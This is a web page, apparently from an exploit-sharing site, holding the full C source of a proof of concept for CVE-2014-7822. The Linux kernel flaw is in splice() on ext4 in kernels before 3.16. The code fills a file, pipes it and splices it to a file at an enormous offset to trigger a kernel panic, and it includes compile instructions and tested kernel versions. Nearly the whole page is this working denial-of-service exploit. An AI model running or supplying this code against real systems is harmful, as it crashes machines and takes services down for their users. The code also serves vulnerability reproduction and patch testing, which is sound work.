扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 |
/* ---------------------------------------------------------------------------------------------------- * cve-2014-7822_poc.c * * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, * as demonstrated by use of a file descriptor associated with an ext4 filesystem. * * * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic. * Works on ext4 filesystem * Tested on Ubuntu with 3.13 and 3.14 kernels * * Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c * * * Emeric Nasi - www.sevagas.com *-----------------------------------------------------------------------------------------------------*/ /* ----------------------- Includes ----------------------------*/ #define _GNU_SOURCE #include <fcntl.h> #include <stdio.h> #include <unistd.h> #include <errno.h> #include <string.h> #include <stdlib.h> #include <limits.h> #define EXPLOIT_NAME "cve-2014-7822" #define EXPLOIT_TYPE DOS #define JUNK_SIZE 30000 /* ----------------------- functions ----------------------------*/ /* Useful: * +============+===============================+===============================+ | \ File flag| | | |\ | !EXT4_EXTENTS_FL|EXT4_EXTETNS_FL| |Fs Features\| | | +------------+-------------------------------+-------------------------------+ | !extent| write:2194719883264 | write: -------------- | || seek: 2199023251456 | seek:-------------- | +------------+-------------------------------+-------------------------------+ |extent| write:4402345721856 | write: 17592186044415 | || seek:17592186044415 | seek:17592186044415 | +------------+-------------------------------+-------------------------------+ */ /** * Poc for cve_2014_7822 vulnerability */ int main() { int pipefd[2]; int result; int in_file; int out_file; int zulHandler; loff_t viciousOffset = 0; char junk[JUNK_SIZE]={0}; result = pipe(pipefd); // Create and clear zug.txt and zul.txt files system("cat /dev/null > zul.txt"); system("cat /dev/null > zug.txt"); // Fill zul.txt with A zulHandler = open("zul.txt", O_RDWR); memset(junk,'A',JUNK_SIZE); write(zulHandler, junk, JUNK_SIZE); close(zulHandler); //put content of zul.txt in pipe viciousOffset = 0; in_file = open("zul.txt", O_RDONLY); result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE); close(in_file); // Put content of pipe in zug.txt out_file = open("zug.txt", O_RDWR); viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!! printf("[cve_2014_7822]: ViciousOffset = %lu\n", (unsigned long)viciousOffset); result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615 if (result == -1) { printf("[cve_2014_7822 error]: %d - %s\n", errno, strerror(errno)); exit(1); } close(out_file); close(pipefd[0]); close(pipefd[1]); //Openzug.txt in_file = open("zug.txt", O_RDONLY); close(in_file); printf("[cve_2014_7822]: POC triggered, ... system will panic after some time\n"); return 0; } |
体验盒子
